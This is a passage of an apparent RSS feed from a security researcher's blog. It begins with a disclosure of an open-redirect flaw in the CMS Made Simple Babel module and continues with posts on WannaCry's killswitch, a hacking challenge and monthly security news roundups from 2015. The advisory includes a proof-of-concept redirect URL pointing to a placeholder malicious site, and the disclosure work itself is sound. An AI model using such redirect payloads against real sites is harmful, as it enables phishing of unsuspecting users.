&lt;p&gt;The &lt;a href=&#34;http://dev.cmsmadesimple.org/projects/babel&#34;&gt;Babel module&lt;/a&gt; provides CMSMS sites with the capacity to easily switch between multiple translations of web page content. Desired translation may be chosen by sending a GET request to vulnerable.site/modules/babel/redirect.php. Under normal conditions, this PHP script takes two arguments - &amp;ldquo;newlang&amp;rdquo; and &amp;ldquo;newurl&amp;rdquo;. The first argument sets the desired language for the translation and the second one sets URL which should be displayed in selected language.&lt;br /&gt;
A non-working example of what the URL might look like is:&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tps://&lt;/span&gt;ww&lt;span&gt;w.vulnerab&lt;/span&gt;le.site/modules/babel/redirect.php?newlang=en_US&amp;amp;newurl=ht&lt;span&gt;tps://&lt;/span&gt;ww&lt;span&gt;w.vulnerab&lt;/span&gt;le.site/about&lt;/kbd&gt;&lt;/p&gt;
&lt;p&gt;The vulnerability is caused by the absence of any filtering when the parameter &amp;ldquo;newurl&amp;rdquo; is processed (the parametr &amp;ldquo;newlang&amp;rdquo; is - for our purposes - optional and may be omitted).&lt;/p&gt;
&lt;h3 id=&#34;proof-of-concept&#34;&gt;Proof of Concept&lt;/h3&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tps://&lt;/span&gt;ww&lt;span&gt;w.vulnerab&lt;/span&gt;le.site/modules/babel/redirect.php?newurl=ht&lt;span&gt;tps://&lt;/span&gt;ww&lt;span&gt;w.malic&lt;/span&gt;ious.site/&lt;/kbd&gt;&lt;/p&gt;
&lt;h3 id=&#34;recommendation&#34;&gt;Recommendation&lt;/h3&gt;
&lt;p&gt;Removal of the Babel module from any affected site.&lt;/p&gt;
&lt;h3 id=&#34;disclosure-timeline&#34;&gt;Disclosure Timeline&lt;/h3&gt;
&lt;p&gt;Developer Contacted: 2. 2. 2019&lt;br /&gt;
Developer Responded: 11. 2. 2019 (project abandoned, no new versions are to be expected)&lt;br /&gt;
Disclosure to CSIRT network: 14. 2. 2019&lt;br /&gt;
Public Disclosure: 20. 2. 2019&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Babel</category>
            
          
        
        
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>It&#39;s 2019 and WannaCry is still not dead</title>
        <link>https://untrustednetwork.net/en/2019/01/30/its-2019-and-wannacry-is-still-not-dead/</link>
        <pubDate>Wed, 30 Jan 2019 17:20:48 +0100</pubDate>
        
        <atom:modified>Wed, 30 Jan 2019 17:20:48 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/01/30/its-2019-and-wannacry-is-still-not-dead/</guid>
        <description>Unless you live completely cut off from the rest of human civilization, chances are good you&amp;rsquo;ve heard about the WannaCry ransomware. However, so we&amp;rsquo;re all on the same page, I&amp;rsquo;ll go over the salient points of its history before discussing why it is still a threat.
WannaCry - the first successful crypto-ransomware worm - started to spread on May 12th 2017 using the EternalBlue exploit and DoublePulsar backdoor implant (both courtesy of the Shadow Brokers and - by proxy - Equation Group/NSA) and supposedly hit more than 100 countries within the first 24 hours.</description>
        <content:encoded>&lt;p&gt;Unless you live completely cut off from the rest of human civilization, chances are good you&amp;rsquo;ve heard about the WannaCry ransomware. However, so we&amp;rsquo;re all on the same page, I&amp;rsquo;ll go over the salient points of its history before discussing why it is still a threat.&lt;/p&gt;
&lt;p&gt;WannaCry - the first successful crypto-ransomware worm - started to spread on May 12th 2017 using the EternalBlue exploit and DoublePulsar backdoor implant (both courtesy of the Shadow Brokers and - by proxy - Equation Group/NSA) and supposedly hit more than 100 countries within the first 24 hours. Although the speed of spreading was nowhere near the famous SQL Slammer/Saphire/Helkern or even CodeRed levels, it was still quite impressive.&lt;/p&gt;
&lt;p&gt;As it is usually the case when a new malware starts to succesfully spread, many researchers started analyzing samples of it. Among these researchers was also the controversial Markus Hutchins, who noticed that the malware used tried to query an at-that-time non-existant domain to decide if it should encrypt data and spread further when it infected any new computer.&lt;br /&gt;
Basically, it tried to connect to the &lt;em&gt;www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com&lt;/em&gt; domain and if it succeeded, it didn&amp;rsquo;t encrypt any data nor did it spread further.&lt;/p&gt;
&lt;p&gt;If fact, except for connecting to this domain on reboot to make sure it was there, the ransomware didn&amp;rsquo;t do much of anything from that point onward. It is unknown why this functionality was implemented in WannaCry (although there are a lot of theories - the two most popular ones considers it either an anti-sandboxing mechanism, or an intentional killswitch to stop the infection should the attacker wish it). However when Hutchins noticed this behaviour, he registered this domain and &amp;ldquo;sinkholed&amp;rdquo; it, which pretty much stopped WannaCry from spreading&amp;hellip;until another version without this &amp;ldquo;killswitch&amp;rdquo; functionality was released, that is.&lt;/p&gt;
&lt;p&gt;Although the number of infected computers was in the hundreds of thousands at least (see the chart bellow - especially the situation in China seems to have been quite interesitng), the outbreak was more or less dealt with within few weeks. Computers spreading WannaCry were disinfected, admins who didn&amp;rsquo;t do so before patched the vulnerability used by EternalBlue exploit and pretty much everyone considered WannaCry dealt with.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/WannaCry-countries-time.png&#34; alt=&#34;WannaCry victims distribution&#34; /&gt;&lt;/p&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: [Bleeping Computer](https://www.bleepingcomputer.com/news/security/new-data-shows-most-wannacry-victims-are-from-china-not-russia/)&lt;/kbd&gt;&lt;/div&gt;
&lt;p&gt;That however seems to be very far from the true state of affairs. Jamie Hankins from KryptosLogic (company which currently takes care of the killswitch domain) published couple of interesting charts based on monitoring of the killswitch in December. As these charts and other information from Hankins show, quite a large number of computers still try to connect to the killswitch domain every day. From the first chart bellow, you may see that during working hours on weekdays, there are between 500,000 and 600,000 requests detected every 3 hours. This indicates that there are still at least tens of thousands of computers infected by the original version of WannaCry. This is both unexpected and quite scary.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/w_cry-requests.jpg&#34; alt=&#34;WannaCry killswitch requests&#34; /&gt;&lt;/p&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: [Jamie Hankins](https://twitter.com/2sec4u/status/1076151355759308800)&lt;/kbd&gt;&lt;/div&gt;
&lt;p&gt;Since the killswitch domain works as it should, the ransomware doesn&amp;rsquo;t do anything malicious at the moment. But should the domain go down or be unaccesible for some reason, WannaCry on the infected computers would &amp;ldquo;wake up&amp;rdquo; again and continue with its normal operations, which would undoubtedly cause major problems to all affected subjects.&lt;/p&gt;
&lt;p&gt;On the second chart bellow, you may see that most of the infected machines seem to be in Asia, however that doesn&amp;rsquo;t mean there are no infections still active in other regions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/w_cry-countries.jpg&#34; alt=&#34;WannaCry victims distribution 2018&#34; /&gt;&lt;/p&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: [Jamie Hankins](https://twitter.com/2sec4u/status/1076151355759308800)&lt;/kbd&gt;&lt;/div&gt;
&lt;p&gt;So this is where we are now - we know WannaCry is still with us and still presents a potential threat. What can we do? It&amp;rsquo;s actually fairly simple. If you don&amp;rsquo;t have any security devices monitoring DNS and web traffic in place, try going through DNS logs for your infrastructure and try to find any lookups for the WannaCry killswitch domain. You probably won&amp;rsquo;t, but it&amp;rsquo;s better to be safe then sorry.&lt;/p&gt;
&lt;p&gt;An if you still haven&amp;rsquo;t applied the &lt;a href=&#34;https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010&#34;&gt;MS17-010&lt;/a&gt; update, well&amp;hellip; in such a case WannaCry might not be your biggest concern, but it&amp;rsquo;d still recommend you apply the patch. After all, it&amp;rsquo;s better to do so more than 18 months late than never.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>WannaCry</category>
            
          
            
              <category>Ransomware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>Miscelaneous tools and links</title>
        <link>https://untrustednetwork.net/en/2019/01/08/miscelaneous-tools-and-links/</link>
        <pubDate>Tue, 08 Jan 2019 08:19:11 +0100</pubDate>
        
        <atom:modified>Tue, 08 Jan 2019 08:19:11 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/01/08/miscelaneous-tools-and-links/</guid>
        <description>I&amp;rsquo;ve added a new page to the site with links to miscelaneous tools and materials useful for Incident Response, Malware Analysis, Penetration Testing, etc. It may be accessed here or through the easily remembered URL http://csirt.xyz.</description>
        <content:encoded>&lt;p&gt;I&amp;rsquo;ve added a new page to the site with links to miscelaneous tools and materials useful for Incident Response, Malware Analysis, Penetration Testing, etc. It may be accessed &lt;a href=&#34;https://www.untrustednetwork.net/en/csirt/&#34;&gt;here&lt;/a&gt; or through the easily remembered URL &lt;a href=&#34;http://csirt.xyz&#34;&gt;http://csirt.xyz&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tools</category>
            
          
            
              <category>Pentest</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>It&#39;s alive (again) !</title>
        <link>https://untrustednetwork.net/en/2018/12/27/its-alive-again/</link>
        <pubDate>Thu, 27 Dec 2018 12:09:22 +0100</pubDate>
        
        <atom:modified>Thu, 27 Dec 2018 12:09:22 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2018/12/27/its-alive-again/</guid>
        <description>Untrusted Network is back! I&amp;rsquo;ve managed to salvage most of the posts from old version of the site so you may find links to those on the main page. So far that&amp;rsquo;s the only content but you may look forward to new posts in 2019!
In the mean time, to post at least something new for 2018, here you may find my presentation from this years DefCamp conference about interesting Open Directories which ALEF CSIRT found in the .</description>
        <content:encoded>&lt;p&gt;Untrusted Network is back! I&amp;rsquo;ve managed to salvage most of the posts from old version of the site so you may find links to those on the main page. So far that&amp;rsquo;s the only content but you may look forward to new posts in 2019!&lt;/p&gt;
&lt;p&gt;In the mean time, to post at least something new for 2018, &lt;a href=&#34;https://www.youtube.com/watch?v=NILZ_NkUnlc&amp;amp;t=26m07s&#34;&gt;here&lt;/a&gt; you may find my presentation from this years DefCamp conference about interesting Open Directories which ALEF CSIRT found in the .CZ and .SK ccTLDs.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>ALEF CSIRT</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2018</category>
            
          
        
        
      </item>
      
      <item>
        <title>ALEF Hacker Challenge</title>
        <link>https://untrustednetwork.net/en/2016/03/15/alef-hacker-challenge/</link>
        <pubDate>Tue, 15 Mar 2016 20:35:41 +0100</pubDate>
        
        <atom:modified>Tue, 15 Mar 2016 20:35:41 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2016/03/15/alef-hacker-challenge/</guid>
        <description>ALEF NULA (in the interest of full disclosure, I&amp;rsquo;d like to mention that I am currently employed by AN) launched a new competition called ALEF Hacker Challenge last week. The intended aim is to compromise a specific system and gather data from it. Although not unique, it is an interesting competition and not only because the main price is 12 000 CZK.</description>
        <content:encoded>&lt;p&gt;ALEF NULA (in the interest of full disclosure, I&amp;rsquo;d like to mention that I am currently employed by AN) launched a new competition called &lt;a href=&#34;https://www.alef.com/alefnula/alef-nula-hacker-challenge.c-209.html&#34;&gt;ALEF Hacker Challenge&lt;/a&gt; last week. The intended aim is to compromise a specific system and gather data from it. Although not unique, it is an interesting competition and not only because the main price is 12 000 CZK.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/AlefHC.png&#34; alt=&#34;ALEF Hacker Challenge&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>ALEF</category>
            
          
            
              <category>CTF</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2016</category>
            
          
        
        
      </item>
      
      <item>
        <title>Looking back at October 2015</title>
        <link>https://untrustednetwork.net/en/2015/11/11/looking-back-at-october-2015/</link>
        <pubDate>Wed, 11 Nov 2015 21:14:53 +0100</pubDate>
        
        <atom:modified>Wed, 11 Nov 2015 21:14:53 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/11/11/looking-back-at-october-2015/</guid>
        <description>October was named European Month of Cyber Security and because of that, many events intended to raise cyber security awareness (such as Security Fest in Prague) were held during the 30 day period. Unfortunately, October has seen just as many new developments on the proverbial &amp;ldquo;dark side&amp;rdquo; of cyber security.
One of these was a widely followed theft of personal data (including credit card numbers) of up to four milion customers of a British telecommunication service provider TalkTalk.</description>
        <content:encoded>&lt;p&gt;October was named &lt;a href=&#34;https://cybersecuritymonth.eu/&#34;&gt;European Month of Cyber Security&lt;/a&gt; and because of that, many events intended to raise cyber security awareness (such as &lt;a href=&#34;https://www.cesnet.cz/sdruzeni/akce/security-fest/&#34;&gt;Security Fest&lt;/a&gt; in Prague) were held during the 30 day period. Unfortunately, October has seen just as many new developments on the proverbial &amp;ldquo;dark side&amp;rdquo; of cyber security.&lt;br /&gt;
One of these was a widely followed theft of personal data (including credit card numbers) of up to &lt;a href=&#34;http://www.zdnet.com/article/talktalk-hack-hits-up-to-4-million-in-unencrypted-data-theft/&#34;&gt;four milion&lt;/a&gt; customers of a British telecommunication service provider TalkTalk. Russian hacker group has claimed responsibility for the attack, however the end of the month has seen &lt;a href=&#34;http://www.v3.co.uk/v3-uk/news/2431859/talktalk-ceo-receives-ransom-note-following-significant-and-sustained-cyber-attack&#34;&gt;arrest&lt;/a&gt; of a small number of young men in Great Britain in connection with the theft.&lt;br /&gt;
The &lt;a href=&#34;https://www.untrustednetwork.net/en/2015/09/08/looking-back-at-august-2015/&#34;&gt;Stagefright&lt;/a&gt; vulnerability in the Android operating system has seen a new development with the discovery of a new vulnerability dubbed &lt;a href=&#34;http://www.androidcentral.com/what-you-need-know-about-stagefright-20&#34;&gt;Stagefright 2.0&lt;/a&gt;. The vulnerability is due to a fault in a code used for accessing multimedia files and enables a potential attacker to execute arbitrary code on the affected device. According to &lt;a href=&#34;http://arstechnica.com/security/2015/10/a-billion-android-phones-are-vulnerable-to-new-stagefright-bugs/&#34;&gt;some sources&lt;/a&gt;, the vulnerability might affect up to one bilion devices. Google has already published a patch for Stagefright 2.0, however since an update can not be provided for all Android-based devices, the vulnerability might provide to be an interesting vector of attack in the future.&lt;br /&gt;
A good final topic for &amp;ldquo;Looking back&amp;rdquo; dedicated to European Cyber Security Month might be the discovery of a new &amp;ldquo;malware&amp;rdquo; named &lt;a href=&#34;http://www.securityweek.com/tens-thousands-routers-ip-cams-infected-vigilante-malware&#34;&gt;Linux.Wifatch&lt;/a&gt;. It spreads by usual network vectors to vulnerable devices running Linux operating system and changes their configuration in a way which makes them harder for other malware to attack. The interesting point is that Wifatch performed no malicious actions on infected devices, as is documented by an &lt;a href=&#34;http://www.forbes.com/sites/thomasbrewster/2015/10/06/mystery-white-team-vigilante-hackers-speak-out/&#34;&gt;interview with its authors&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Android</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Ransomware</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at September 2015</title>
        <link>https://untrustednetwork.net/en/2015/10/18/looking-back-at-september-2015/</link>
        <pubDate>Sun, 18 Oct 2015 16:13:47 +0100</pubDate>
        
        <atom:modified>Sun, 18 Oct 2015 16:13:47 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/10/18/looking-back-at-september-2015/</guid>
        <description>Information concerning number of devices vulnerable to Heartbleed vulnerability has appeared in the news during September. Given that the existence of Heartbleed was made public almost a year and a half ago it may be surprising that the number of vulnerable devices exceeds 200.000.
Affair concerning the Stagefright vulnerability (which was mentioned in the last Looking back) continued in September when Zimperium – the company which discovered Stagefright – released a proof-of-concept code which exploits the vulnerability.</description>
        <content:encoded>&lt;p&gt;Information concerning number of devices &lt;a href=&#34;http://www.theinquirer.net/inquirer/news/2426409/heartbleed-still-affects-200-000-devices-because-vendors-are-lazy-maybe&#34;&gt;vulnerable to Heartbleed&lt;/a&gt; vulnerability has appeared in the news during September. Given that the existence of Heartbleed was made public almost a year and a half ago it may be surprising that the number of vulnerable devices exceeds 200.000.&lt;br /&gt;
Affair concerning the Stagefright vulnerability (which was mentioned in the &lt;a href=&#34;https://www.untrustednetwork.net/en/2015/09/08/looking-back-at-august-2015/&#34;&gt;last Looking back&lt;/a&gt;) continued in September when Zimperium – the company which discovered Stagefright – &lt;a href=&#34;http://arstechnica.com/security/2015/09/attack-code-exploiting-androids-critical-stagefright-bugs-is-now-public/&#34;&gt;released&lt;/a&gt; a proof-of-concept code which exploits the vulnerability.&lt;br /&gt;
A stealth malware hidden in modified Cisco IOS images and named &lt;a href=&#34;http://arstechnica.com/security/2015/09/malicious-cisco-router-backdoor-found-on-79-more-devices-25-in-the-us/&#34;&gt;SYNful knock&lt;/a&gt; has been discovered on tens of Cisco routers around the world. The malware functions as a backdoor and besides the (persistent) IOS-embedded main component uses tens of modules which provide further functionality which it loads into volatile memory.&lt;br /&gt;
It should be mentioned that Google, Microsoft and Mozzila made a &lt;a href=&#34;http://threatpost.com/google-mozilla-microsoft-to-sever-rc4-support-in-early-2016/114498/&#34;&gt;press release&lt;/a&gt; announcing that their browsers will stop supporting the RC4 encryption algorithm early next year.&lt;br /&gt;
One final piece of interesting news we will mention has been the discovery of a malware targeted at online poker players. The trojan horse is named &lt;a href=&#34;http://www.welivesecurity.com/2015/09/17/the-trojan-games-odlanor-malware-cheats-at-poker/&#34;&gt;Odlanor&lt;/a&gt; and captures screenshots of applications used for playing poker online and then sends them to the attacker.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Heartbleed</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Cisco</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Google</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Mozzila</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at August 2015</title>
        <link>https://untrustednetwork.net/en/2015/09/08/looking-back-at-august-2015/</link>
        <pubDate>Tue, 08 Sep 2015 17:06:42 +0100</pubDate>
        
        <atom:modified>Tue, 08 Sep 2015 17:06:42 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/09/08/looking-back-at-august-2015/</guid>
        <description>One of the most important information related to cyber security pertains to August release of a patch for the Stagefright vulnerability, to which almost all versions of the Android OS from versions 2.2 to version 5.1 are vulnerable. The existence of Stagefright had been made public at the end of July and it is estimated that vulnerable device number in hundreds of millions. The vulnerability enables the attacker to cause arbitrary code execution by sending a specially crafted MMS.</description>
        <content:encoded>&lt;p&gt;One of the most important information related to cyber security pertains to August release of a patch for the Stagefright vulnerability, to which almost all versions of the Android OS from versions 2.2 to version 5.1 are vulnerable. The existence of Stagefright had been made public at the end of July and it is estimated that vulnerable device number in hundreds of millions. The vulnerability enables the attacker to cause arbitrary code execution by sending a specially crafted MMS. The released patch has unfortunately been shown to be incomplete, the result of which is that even updated devices are &lt;a href=&#34;http://www.theregister.co.uk/2015/08/17/botched_google_stagefright_fix_wont_be_resolved_until_september/&#34;&gt;still vulnerable&lt;/a&gt;.&lt;br /&gt;
Another interesting vulnerability which also affects a mobile platform (in this case iOS) is called &lt;a href=&#34;http://www.v3.co.uk/v3-uk/news/2423493/apple-ios-ins0mnia-flaw-that-hides-malicious-apps-revealed-by-fireeye&#34;&gt;Ins0mnia&lt;/a&gt;. The vulnerability enables malicious applications to circumvent OS security controls and run in the background without users knowledge (and – for example – collect sensitive information). Ins0mnia affects even non-jailbroken devices and has been patched in the iOS 8.4.1 update.&lt;br /&gt;
One further August news story has been connected to Apple products – creation of the &lt;a href=&#34;http://www.wired.com/2015/08/researchers-create-first-firmware-worm-attacks-macs/&#34;&gt;Thunderstrike 2.0&lt;/a&gt; proof-of-concept worm which is able to &lt;a href=&#34;https://www.untrustednetwork.cz/en/2015/07/18/looking-back-at-june-2015/&#34;&gt;infect firmware of Macs&lt;/a&gt;. Given the location of infected memory, it is highly problematic to detect the infection from the OS and removal of the worm requires firmware to be re-flashed.&lt;br /&gt;
Another newly discovered (however 18 years old) attack vector also exploits vulnerability connected to computer hardware. A vulnerability in &lt;a href=&#34;http://www.computerworld.com/article/2962325/computer-processors/design-flaw-in-intel-chips-opens-door-to-rootkits.html&#34;&gt;Intel&lt;/a&gt; x86 processors enables an attacker to install rootkit into memory location used by SMM (System Management Mode – a privileged mode used outside of normal OS execution).&lt;br /&gt;
One final interesting news comes from the Czech Republic and concerns signing of a &lt;a href=&#34;https://drive.google.com/file/d/0B1nMeoUI7ko4Q3dTbkVyN2RsbWs/view&#34;&gt;sectoral agreement&lt;/a&gt; about cyber security education between commercial and governmental entities.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Android</category>
            
          
            
              <category>Apple</category>
            
          
            
              <category>Intel</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Government</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at July 2015</title>
        <link>https://untrustednetwork.net/en/2015/08/05/looking-back-at-july-2015/</link>
        <pubDate>Wed, 05 Aug 2015 10:27:36 +0100</pubDate>
        
        <atom:modified>Wed, 05 Aug 2015 10:27:36 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/08/05/looking-back-at-july-2015/</guid>
        <description>The most important IT security-related news in July has definitely been the affair surrounding a theft of data from the Hacking Team – company, which develops commercial spyware intended for use by police departments and other security agencies. More than 400 GB of stolen data were made public and afterwards analyzed by IT security specialists, leading to discovery of a large number (still growing) of zero-day vulnerabilities which were used in Hacking Team’s products.</description>
        <content:encoded>&lt;p&gt;The most important IT security-related news in July has definitely been the affair surrounding a &lt;a href=&#34;http://www.tripwire.com/state-of-security/latest-security-news/hacking-team-breach-reveals-nation-state-corporate-customers/&#34;&gt;theft&lt;/a&gt; of data from the Hacking Team – company, which develops commercial spyware intended for use by police departments and other security agencies. More than 400 GB of stolen data were made public and afterwards analyzed by IT security specialists, leading to discovery of a large number (still growing) of zero-day vulnerabilities which were used in Hacking Team’s products.&lt;br /&gt;
An interesting news appeared also in connection with vehicle security. Two researchers managed to leverage a vulnerability in a wirelessly accessible on-board entertainment system of a Jeep Cherokee which enabled them to remotely &lt;a href=&#34;http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/&#34;&gt;control&lt;/a&gt; some of the vehicle’s functions and components, including transmission. Fiat Chrysler has responded to publication of the vulnerability by a &lt;a href=&#34;http://www.bbc.com/news/technology-33650491&#34;&gt;recall&lt;/a&gt; of 1.4 million of affected vehicles. Similar action in connection with software bugs/vulnerabilities was also taken by &lt;a href=&#34;http://www.bbc.com/news/technology-33506486&#34;&gt;Land Rover&lt;/a&gt; and &lt;a href=&#34;http://www.theregister.co.uk/2015/07/08/ford_car_software_recall_analysis/&#34;&gt;Ford&lt;/a&gt;.&lt;br /&gt;
A mention should be made of a press release by &lt;a href=&#34;https://www.europol.europa.eu/content/cybercriminal-darkode-forum-taken-down-through-global-action&#34;&gt;Europol&lt;/a&gt;, made in the middle of the month, regarding a successful operation to take down the Darkode cybercriminal forum. Although 28 users and administrators were arrested in, the forum &lt;a href=&#34;http://www.theregister.co.uk/2015/07/28/darkode_returns/&#34;&gt;resumed&lt;/a&gt; its operation only two weeks later.&lt;br /&gt;
Another vulnerability has also been discovered in OpenSSL, which enables an attacker to potentially use &lt;a href=&#34;http://www.theinquirer.net/inquirer/news/2416825/high-severity-bug-found-in-openssl-raises-fears-of-another-heartbleed&#34;&gt;invalid&lt;/a&gt; certificate as a valid one. A fix for the vulnerability was released only few days after its publication.&lt;br /&gt;
An interesting new &lt;a href=&#34;http://www.wired.com/2014/11/airhopper-hack/&#34;&gt;attack&lt;/a&gt; which could lead to extraction of data from an air-gapped system has also been made public. It is based on transmitting a radio signal generated by the computer using a video card bus as an antenna and received by a nearby mobile phone.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Hacking Team</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>TLS/SSL</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at June 2015</title>
        <link>https://untrustednetwork.net/en/2015/07/18/looking-back-at-june-2015/</link>
        <pubDate>Sat, 18 Jul 2015 17:29:33 +0100</pubDate>
        
        <atom:modified>Sat, 18 Jul 2015 17:29:33 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/07/18/looking-back-at-june-2015/</guid>
        <description>Probably the most interesting of security-related news in June has been an announcement by OPM (Office of Personnel Management of United States), organization which is responsible for HR services and administration of US federal employees, about an attack which exposed records for approximately four million current and past employees. The breach has apparently been active for some time before it was discovered using a special IDS called Einstein. Anonymous US officials attributed the attack to China.</description>
        <content:encoded>&lt;p&gt;Probably the most interesting of security-related news in June has been an &lt;a href=&#34;http://arstechnica.com/security/2015/06/federal-agency-hit-by-chinese-hackers-around-4-million-employees-affected/&#34;&gt;announcement&lt;/a&gt; by OPM (Office of Personnel Management of United States), organization which is responsible for HR services and administration of US federal employees, about an attack which exposed records for approximately four million current and past employees. The breach has apparently been active for some time before it was &lt;a href=&#34;http://arstechnica.com/security/2015/06/why-the-biggest-government-hack-ever-got-past-opm-dhs-and-nsa/&#34;&gt;discovered&lt;/a&gt; using a special IDS called Einstein. Anonymous US officials attributed the attack to &lt;a href=&#34;http://www.forbes.com/sites/katevinton/2015/06/11/federal-union-says-opm-data-breach-hit-every-single-federal-employee/&#34;&gt;China&lt;/a&gt;.&lt;br /&gt;
Information about a &lt;a href=&#34;http://www.tripwire.com/state-of-security/latest-security-news/hackers-steal-over-a-million-japanese-citizens-personal-data-in-targeted-attack/&#34;&gt;similar&lt;/a&gt; attack in Japan has been made available in June. Personal information about approximately 1.25 million citizens was stolen during the attack. Primary attack vector appears to have been a malicious e-mail attachment.&lt;br /&gt;
For owners and users of Apple products might be interesting news about discovery of a &lt;a href=&#34;http://arstechnica.com/security/2015/06/new-remote-exploit-leaves-most-macs-vulnerable-to-permanent-backdooring/&#34;&gt;vulnerability&lt;/a&gt;, which enables attacker to rewrite FW in older (devices shipped before the second half of 2014) Macs. The vulnerability enables the attacker to make changes in BIOS when the device is waking up from sleep (when the FLOCKDN protection which should ensure that some parts of the system are accesible in read-only mode is disabled) which may be used to gain root privileges.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Apple</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Government</category>
            
          
            
              <category>PII</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at May 2015</title>
        <link>https://untrustednetwork.net/en/2015/06/05/looking-back-at-may-2015/</link>
        <pubDate>Fri, 05 Jun 2015 00:00:57 +0100</pubDate>
        
        <atom:modified>Fri, 05 Jun 2015 00:00:57 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/06/05/looking-back-at-may-2015/</guid>
        <description>May has been at least as rich on cybersecurity incidents and events as any of the previous months of the year. Some of the more important are described in the following text.
The VENOM (Virtual Environment Neglected Operations Manipulation) vulnerability may be considered to be a very significant one. VENOM is a vulnerability in the code of a virtual floppy drive which is used by some of the virtualization platforms (QEMU, KVM, Xen).</description>
        <content:encoded>&lt;p&gt;May has been at least as rich on cybersecurity incidents and events as any of the previous months of the year. Some of the more important are described in the following text.&lt;br /&gt;
The &lt;a href=&#34;http://venom.crowdstrike.com/&#34;&gt;VENOM&lt;/a&gt; (Virtual Environment Neglected Operations Manipulation) vulnerability may be considered to be a very significant one. VENOM is a vulnerability in the code of a virtual floppy drive which is used by some of the virtualization platforms (QEMU, KVM, Xen). It enables the attacker to access underlying hypervisor from a virtualized OS using a buffer overflow attack. Since the vulnerability is non OS specific its impact is fairly high.&lt;br /&gt;
A mention should also be made of another of the TLS/SSL protocol implementation vulnerabilities, the so-called &lt;a href=&#34;https://weakdh.org/&#34;&gt;Logjam&lt;/a&gt;. Using Logjam, a downgrade of encryption is possible in man in the middle attacks on connections which use Diffie Hellman key exchange algorithm and support its export version.&lt;br /&gt;
Finally, it is noteworthy that the government has ratified an Action plan for National Cyber Security Strategy 2015 – 2020. Further information (in Czech) may be found &lt;a href=&#34;http://www.govcert.cz/cs/informacni-servis/akce-a-udalosti/vlada-schvalila-akcni-plan-k-narodni-strategii-kyberneticke-bezpecnosti-ceske-republiky-pro-pristich-pet-let-a-zpravu-o-stavu-kyberneticke-bezpecnosti-ceske-republiky-2014/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>TLS/SSL</category>
            
          
            
              <category>Virtualization</category>
            
          
            
              <category>Government</category>
            
